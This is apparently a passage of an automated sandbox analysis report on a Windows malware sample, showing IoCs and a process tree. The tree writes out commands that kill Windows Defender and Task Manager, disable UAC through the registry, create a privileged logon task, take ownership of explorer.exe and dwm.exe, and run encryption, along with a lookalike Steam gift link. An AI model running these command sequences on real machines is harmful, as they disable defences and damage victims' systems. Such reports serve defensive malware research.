208	msedge.exe
208	msedge.exe
208	msedge.exe

Suspicious use of SetWindowsHookEx 22 IoCs

Processes:

3.exeRomilyaa.exevlc.exeOpenWith.exeOpenWith.exeWINWORD.EXEsjhkhda.exemsedge.exeStartMenuExperienceHost.exeSearchApp.exeexplorer.exe3.exe

pid	process
3256	3.exe
3256	3.exe
5948	Romilyaa.exe
3048	vlc.exe
3764	OpenWith.exe
3924	OpenWith.exe
4784	WINWORD.EXE
4784	WINWORD.EXE
4784	WINWORD.EXE
4348	sjhkhda.exe
2328	msedge.exe
2328	msedge.exe
2328	msedge.exe
2328	msedge.exe
2328	msedge.exe
2328	msedge.exe
6692	StartMenuExperienceHost.exe
1828	SearchApp.exe
2196	explorer.exe
928	3.exe
928	3.exe
2196	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

vir.execmd.execmd.exenet.exenet.exemsedge.exemsedge.exe

description	pid	process	target process
PID 4128 wrote to memory of 2628	4128	vir.exe	ProgressBarSplash.exe
PID 4128 wrote to memory of 2628	4128	vir.exe	ProgressBarSplash.exe
PID 4128 wrote to memory of 2628	4128	vir.exe	ProgressBarSplash.exe
PID 4128 wrote to memory of 4776	4128	vir.exe	cmd.exe
PID 4128 wrote to memory of 4776	4128	vir.exe	cmd.exe
PID 4128 wrote to memory of 4776	4128	vir.exe	cmd.exe
PID 4776 wrote to memory of 4512	4776	cmd.exe	cmd.exe
PID 4776 wrote to memory of 4512	4776	cmd.exe	cmd.exe
PID 4776 wrote to memory of 4512	4776	cmd.exe	cmd.exe
PID 4776 wrote to memory of 4188	4776	cmd.exe	PING.EXE
PID 4776 wrote to memory of 4188	4776	cmd.exe	PING.EXE
PID 4776 wrote to memory of 4188	4776	cmd.exe	PING.EXE
PID 4512 wrote to memory of 2816	4512	cmd.exe	ipconfig.exe
PID 4512 wrote to memory of 2816	4512	cmd.exe	ipconfig.exe
PID 4512 wrote to memory of 2816	4512	cmd.exe	ipconfig.exe
PID 4776 wrote to memory of 2340	4776	cmd.exe	taskkill.exe
PID 4776 wrote to memory of 2340	4776	cmd.exe	taskkill.exe
PID 4776 wrote to memory of 2340	4776	cmd.exe	taskkill.exe
PID 4512 wrote to memory of 748	4512	cmd.exe	net.exe
PID 4512 wrote to memory of 748	4512	cmd.exe	net.exe
PID 4512 wrote to memory of 748	4512	cmd.exe	net.exe
PID 4776 wrote to memory of 4292	4776	cmd.exe	cmd.exe
PID 4776 wrote to memory of 4292	4776	cmd.exe	cmd.exe
PID 4776 wrote to memory of 4292	4776	cmd.exe	cmd.exe
PID 748 wrote to memory of 3460	748	net.exe	net1.exe
PID 748 wrote to memory of 3460	748	net.exe	net1.exe
PID 748 wrote to memory of 3460	748	net.exe	net1.exe
PID 4512 wrote to memory of 2376	4512	cmd.exe	PING.EXE
PID 4512 wrote to memory of 2376	4512	cmd.exe	PING.EXE
PID 4512 wrote to memory of 2376	4512	cmd.exe	PING.EXE
PID 2376 wrote to memory of 4984	2376	net.exe	net1.exe
PID 2376 wrote to memory of 4984	2376	net.exe	net1.exe
PID 2376 wrote to memory of 4984	2376	net.exe	net1.exe
PID 4776 wrote to memory of 1028	4776	cmd.exe	msedge.exe
PID 4776 wrote to memory of 1028	4776	cmd.exe	msedge.exe
PID 1028 wrote to memory of 3164	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 3164	1028	msedge.exe	msedge.exe
PID 4776 wrote to memory of 4880	4776	cmd.exe	cmd.exe
PID 4776 wrote to memory of 4880	4776	cmd.exe	cmd.exe
PID 4776 wrote to memory of 4880	4776	cmd.exe	cmd.exe
PID 4776 wrote to memory of 4580	4776	cmd.exe	Rover.exe
PID 4776 wrote to memory of 4580	4776	cmd.exe	Rover.exe
PID 4776 wrote to memory of 4580	4776	cmd.exe	Rover.exe
PID 4776 wrote to memory of 4940	4776	cmd.exe	msedge.exe
PID 4776 wrote to memory of 4940	4776	cmd.exe	msedge.exe
PID 4940 wrote to memory of 3936	4940	msedge.exe	msedge.exe
PID 4940 wrote to memory of 3936	4940	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe
PID 1028 wrote to memory of 4520	1028	msedge.exe	msedge.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

Rover.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Rover.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "1"	Rover.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4976 attrib.exe

outlook_office_path 1 IoCs

Processes:

sjhkhda.exe

description	ioc	process
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe

outlook_win_path 1 IoCs

Processes:

sjhkhda.exe

description	ioc	process
Key queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	sjhkhda.exe

C:\Users\Admin\AppData\Local\Temp\vir.exe
"C:\Users\Admin\AppData\Local\Temp\vir.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4128
- C:\Users\Admin\AppData\Local\Temp\d5646294-a913-4787-986e-85d0374cf84b\ProgressBarSplash.exe
  "C:\Users\Admin\AppData\Local\Temp\d5646294-a913-4787-986e-85d0374cf84b\ProgressBarSplash.exe" -unpacking
  2⤵
  - Executes dropped EXE
  PID:2628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\!main.cmd" "
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K doxx.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4512
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig
      4⤵
      Gathers network information
      PID:2816
  - - C:\Windows\SysWOW64\net.exe
      net accounts
      4⤵
      Suspicious use of WriteProcessMemory
      PID:748
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts
        5⤵
        
        PID:3460
  - - C:\Windows\SysWOW64\net.exe
      net user
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2376
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user
        5⤵
        
        PID:4984
- - C:\Windows\SysWOW64\PING.EXE
    ping google.com -t -n 1 -s 4 -4
    3⤵
    - Runs ping.exe
    PID:4188
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im WindowsDefender.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K handler.cmd
    3⤵
    PID:4292
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://stemcommunylty.com/glft/76561199126377093
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1028
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa53ba46f8,0x7ffa53ba4708,0x7ffa53ba4718
      4⤵
      PID:3164
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1448,797371614164906519,1243433869897020009,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
      4⤵
      PID:4520
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1448,797371614164906519,1243433869897020009,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3856
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1448,797371614164906519,1243433869897020009,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
      4⤵
      PID:1428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,797371614164906519,1243433869897020009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
      4⤵
      PID:3392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,797371614164906519,1243433869897020009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
      4⤵
      PID:3176
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1448,797371614164906519,1243433869897020009,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4488 /prefetch:1
      4⤵
      PID:316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K cipher.cmd
    3⤵
    PID:4880
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e
      4⤵
      PID:5356
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e
      4⤵
      PID:6076
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e
      4⤵
      PID:1716
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e
      4⤵
      PID:4264
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\Rover.exe
    Rover.exe
    3⤵
    - Modifies WinLogon for persistence
    - UAC bypass
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - System policy modification
    PID:4580
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\web.htm
    3⤵
    - Manipulates Digital Signatures
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa53ba46f8,0x7ffa53ba4708,0x7ffa53ba4718
      4⤵
      PID:3936
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1456,18272036968667566753,6595633772555558619,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
      4⤵
      PID:5688
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1456,18272036968667566753,6595633772555558619,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5808
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1456,18272036968667566753,6595633772555558619,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
      4⤵
      PID:4200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,18272036968667566753,6595633772555558619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
      4⤵
      PID:1448
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1456,18272036968667566753,6595633772555558619,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
      4⤵
      PID:492
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\Google.exe
    Google.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    PID:2932
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\helper.vbs"
    3⤵
    PID:5604
- - C:\Windows\SysWOW64\PING.EXE
    ping google.com -t -n 1 -s 4 -4
    3⤵
    - Runs ping.exe
    PID:2376
- - C:\Windows\SysWOW64\PING.EXE
    ping mrbeast.codes -t -n 1 -s 4 -4
    3⤵
    - Runs ping.exe
    PID:4628
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy Google.exe C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:5928
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy Rover.exe C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:5096
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy spinner.gif C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:2668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K bloatware.cmd
    3⤵
    - Checks computer location settings
    - Modifies registry class
    PID:4960
  - - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\bloatware\1.exe
      1.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies registry class
      PID:1836
    - - C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
        
        "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet
        5⤵
        Executes dropped EXE
        
        PID:3924
      - C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
        
        "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{7E397EDA-E45F-4D1D-8B00-04B224FDBAEE} {E6C282DA-5896-4329-A157-8273915F764B} 3924
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5128
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c install.bat
        5⤵
        
        PID:208
      - C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "DroidCamFilter32.ax"
        6⤵
        Loads dropped DLL
        Modifies registry class
        
        PID:4768
      - C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "DroidCamFilter64.ax"
        6⤵
        Loads dropped DLL
        
        PID:5032
        
        C:\Windows\system32\regsvr32.exe
        
        /s "DroidCamFilter64.ax"
        7⤵
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:1100
    - - C:\Program Files (x86)\DroidCam\lib\insdrv.exe
        
        "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +v
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Suspicious use of AdjustPrivilegeToken
        
        PID:5764
    - - C:\Program Files (x86)\DroidCam\lib\insdrv.exe
        
        "C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Suspicious use of AdjustPrivilegeToken
        
        PID:5156
  - - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\bloatware\3.exe
      3.exe
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:3256
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 1808
        5⤵
        Program crash
        
        PID:5952
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\bloatware\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      4⤵
      Blocklisted process makes network request
      PID:2280
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K SilentSetup.cmd
      4⤵
      PID:1100
    - - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
        
        WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
        5⤵
        Executes dropped EXE
        
        PID:3608
      - C:\Users\Admin\AppData\Local\Temp\is-39RMA.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-39RMA.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$601EC,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:5548
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
        7⤵
        
        PID:2800
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im winaerotweaker.exe /f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5932
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
        7⤵
        
        PID:5988
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im winaerotweakerhelper.exe /f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5620
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\regmess.exe
    regmess.exe
    3⤵
    - Executes dropped EXE
    PID:2496
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\regmess_fd226bcc-d495-4099-9563-24186d89a9a9\regmess.bat" "
      4⤵
      PID:3396
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Setup.reg /reg:32
        5⤵
        
        PID:4108
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Console.reg /reg:32
        5⤵
        
        PID:2540
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Desktop.reg /reg:32
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4088
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import International.reg /reg:32
        5⤵
        
        PID:4300
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Fonts.reg /reg:32
        5⤵
        Modifies Internet Explorer settings
        
        PID:5748
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Cursors.reg /reg:32
        5⤵
        
        PID:4388
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 10
    3⤵
    - Delays execution with timeout.exe
    PID:5800
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\scary.exe
    scary.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2852
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:6036
  - - C:\Program Files\SubDir\Romilyaa.exe
      "C:\Program Files\SubDir\Romilyaa.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:5948
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:1488
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\the.exe
    the.exe
    3⤵
    - Executes dropped EXE
    PID:5564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im taskmgr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2156
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\wimloader.dll
    wimloader.dll
    3⤵
    - Executes dropped EXE
    PID:5332
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_8b73862f-0113-4687-89e1-e118639d3df9\caller.cmd" "
      4⤵
      PID:5516
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\ac3.exe
    ac3.exe
    3⤵
    - Executes dropped EXE
    PID:4368
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\shell1.ps1"
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\PING.EXE
    ping trustsentry.com -t -n 1 -s 4 -4
    3⤵
    - Runs ping.exe
    PID:5848
- - C:\Windows\SysWOW64\PING.EXE
    ping ya.ru -t -n 1 -s 4 -4
    3⤵
    - Runs ping.exe
    PID:3256
- - C:\Windows\SysWOW64\PING.EXE
    ping tria.ge -t -n 1 -s 4 -4
    3⤵
    - Runs ping.exe
    PID:2788
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy bloatware C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:5784
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy beastify.url C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:5760
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy shell1.ps1 C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:3956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /R /F C:\Windows\explorer.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4484
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\Windows\explorer.exe /grant Admin:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /R /F C:\Windows\System32\dwm.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4228
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3092
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy xcer.cer C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:5516
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:5772
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:3152
- - C:\Users\Admin\AppData\Local\Temp\vir_bde465e6-5de1-4597-81f0-c42072322b8d\freebobux.exe
    freebobux.exe
    3⤵
    - Executes dropped EXE
    PID:2364
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F96E.tmp\freebobux.bat""
      4⤵
      Checks computer location settings
      Modifies registry class
      PID:232
    - - C:\Users\Admin\AppData\Local\Temp\F96E.tmp\CLWCP.exe
        
        clwcp c:\temp\bg.bmp
        5⤵
        Executes dropped EXE
        Sets desktop wallpaper using registry
        
        PID:1780
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\F96E.tmp\x.vbs"
        5⤵
        
